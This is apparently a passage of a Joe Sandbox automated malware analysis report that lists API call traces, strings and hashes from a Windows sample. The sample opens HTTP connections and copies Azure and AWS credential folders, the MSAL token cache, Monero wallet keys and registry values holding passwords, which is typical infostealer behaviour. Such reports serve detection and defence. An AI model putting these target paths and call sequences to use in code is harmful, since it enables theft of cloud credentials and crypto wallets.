Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 03797cf5f96df8fce6fe939d2886cf30c42794843d36c51701963719945da009
Instruction ID: 4bc95bb88d2b1787926f0f6c7a08d90fd9186c66ed970cbf976fcbd7807387da
Opcode Fuzzy Hash: 03797cf5f96df8fce6fe939d2886cf30c42794843d36c51701963719945da009
Instruction Fuzzy Hash: C7811C71911118AFEB68DB54CC95FEAB7B8FF18700F008299E10AE6540DF756B86CFA1

Function 00896280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(008B0DFE,00000001,00000000,00000000,00000000), ref: 008962E1
StrCmpCA.SHLWAPI(?,0142E808), ref: 00896303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00896335
HttpOpenRequestA.WININET(00000000,GET,?,0142E1B8,00000000,00000000,00400100,00000000), ref: 00896385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008963BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008963D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008963FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0089646D
InternetCloseHandle.WININET(00000000), ref: 008964EF
InternetCloseHandle.WININET(00000000), ref: 008964F9
InternetCloseHandle.WININET(00000000), ref: 00896503

Strings

GET, xrefs: 0089637C
ERROR, xrefs: 008964C9
ERROR, xrefs: 00896407

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 185c8fe73346ba73f310e3a67d82c92af449b1c2558ee91c08b8b04823836c0b
Instruction ID: faed8fa9d313023f36122a82ed3bc2a125b2734f4aa14519e12d717a39a76b32
Opcode Fuzzy Hash: 185c8fe73346ba73f310e3a67d82c92af449b1c2558ee91c08b8b04823836c0b
Instruction Fuzzy Hash: A1715E71A00218ABEF14EFE4DC49BEE7774FB44700F108159F50AAB690EBB46A85CF52

Function 008A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5857

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5228

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5318
Part of subcall function 008A52C0: lstrlen.KERNEL32(00000000), ref: 008A532F
Part of subcall function 008A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008A5364
Part of subcall function 008A52C0: lstrlen.KERNEL32(00000000), ref: 008A5383
Part of subcall function 008A52C0: lstrlen.KERNEL32(00000000), ref: 008A53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5A0C
Sleep.KERNEL32(0000EA60), ref: 008A5A1B

Strings

ERROR, xrefs: 008A5636
ERROR, xrefs: 008A577D
ERROR, xrefs: 008A59FE
ERROR, xrefs: 008A5693
ERROR, xrefs: 008A5849
ERROR, xrefs: 008A5932

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 214cc792f425a2b0fa6be0564415fb64f3cc5c60ddb510e48295cdbec0f623f5
Instruction ID: 6e7ed5c4d73425538f3677a0ae23a2bed6add955526a5374022670ffe8b8f4d7
Opcode Fuzzy Hash: 214cc792f425a2b0fa6be0564415fb64f3cc5c60ddb510e48295cdbec0f623f5
Instruction Fuzzy Hash: 50E143719101049BEB58FBA4DC96AFE7338FB55300F408129B417D6D91EF386A4ACB93

Function 008A4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 008A4DCD

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

lstrcat.KERNEL32(?,00000000), ref: 008A4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 008A4E59

Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
Part of subcall function 008A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
Part of subcall function 008A4910: FindClose.KERNEL32(000000FF), ref: 008A4B92

lstrcat.KERNEL32(?,00000000), ref: 008A4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 008A4EE5

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49B0
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B08D2), ref: 008A49C5
Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49E2
Part of subcall function 008A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008A4A1E
Part of subcall function 008A4910: lstrcat.KERNEL32(?,0142E8F8), ref: 008A4A4A
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FF8), ref: 008A4A5C
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A70
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FFC), ref: 008A4A82
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A96
Part of subcall function 008A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008A4AAC
Part of subcall function 008A4910: DeleteFileA.KERNEL32(?), ref: 008A4B31

Strings

\.aws\, xrefs: 008A4E4D
\.azure\, xrefs: 008A4DC1
Azure\.IdentityService, xrefs: 008A4EEB
*.*, xrefs: 008A4E64
msal.cache, xrefs: 008A4EF0
Azure\.azure, xrefs: 008A4DD3
Azure\.aws, xrefs: 008A4E5F
\.IdentityService\, xrefs: 008A4ED9
*.*, xrefs: 008A4DD8

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 1c7532fe694a99885572015f5a55983803f1795aea7dcace96ca9a0c470d90b8
Instruction ID: af9113b3e8cbebaa453c3bb6c83307903c5116893c28236f8e6ad46cd4c34ba5
Opcode Fuzzy Hash: 1c7532fe694a99885572015f5a55983803f1795aea7dcace96ca9a0c470d90b8
Instruction Fuzzy Hash: C741C27AA4020867DB54F760EC5BFEE3338FB25700F404454B546E62C1EEB86B898B93

Function 00891310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008912B4
Part of subcall function 008912A0: RtlAllocateHeap.NTDLL(00000000), ref: 008912BB
Part of subcall function 008912A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008912D7
Part of subcall function 008912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008912F5
Part of subcall function 008912A0: RegCloseKey.ADVAPI32(?), ref: 008912FF

lstrcat.KERNEL32(?,00000000), ref: 0089134F
lstrlen.KERNEL32(?), ref: 0089135C
lstrcat.KERNEL32(?,.keys), ref: 00891377

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0142A240,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00891465

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

DeleteFileA.KERNEL32(00000000), ref: 008914EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00891335
\Monero\wallet.keys, xrefs: 0089138D
.keys, xrefs: 0089136B
wallet_path, xrefs: 00891330

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 07b8fc56f94845e290df0597e3462d70dc9ef2ef930dfad3dad4a07797cb1a48
Instruction ID: 93bbcf45b1c3be8e31f17ac444484cea3ba647cf8c4817e23c3fc383740508ae
Opcode Fuzzy Hash: 07b8fc56f94845e290df0597e3462d70dc9ef2ef930dfad3dad4a07797cb1a48
Instruction Fuzzy Hash: E75164B19501195BDB59FB64DC92BEE733CFF11300F4041A8B60AE2481EF346B86CAA7

Function 008975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008972D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0089733A
Part of subcall function 008972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008973B1
Part of subcall function 008972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0089740D
Part of subcall function 008972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00897452
Part of subcall function 008972D0: HeapFree.KERNEL32(00000000), ref: 00897459

lstrcat.KERNEL32(2FB00020,008B17FC), ref: 00897606
lstrcat.KERNEL32(2FB00020,00000000), ref: 00897648
lstrcat.KERNEL32(2FB00020, : ), ref: 0089765A
lstrcat.KERNEL32(2FB00020,00000000), ref: 0089768F
lstrcat.KERNEL32(2FB00020,008B1804), ref: 008976A0
lstrcat.KERNEL32(2FB00020,00000000), ref: 008976D3
lstrcat.KERNEL32(2FB00020,008B1808), ref: 008976ED
task.LIBCPMTD ref: 008976FB

Strings

: , xrefs: 0089764E

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 98fa88fb2617673d0405095edbdfad21ff727a85a39340686e2c2409ce1613ea
